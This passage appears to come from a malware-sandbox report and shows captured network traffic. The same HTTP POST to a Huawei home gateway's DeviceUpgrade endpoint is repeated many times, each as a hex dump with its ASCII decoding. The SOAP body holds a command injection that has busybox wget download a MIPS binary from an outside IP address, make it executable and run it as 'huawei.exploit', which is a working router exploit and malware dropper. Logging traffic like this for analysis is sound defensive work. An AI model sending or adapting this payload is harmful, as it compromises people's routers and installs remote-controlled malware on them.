6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 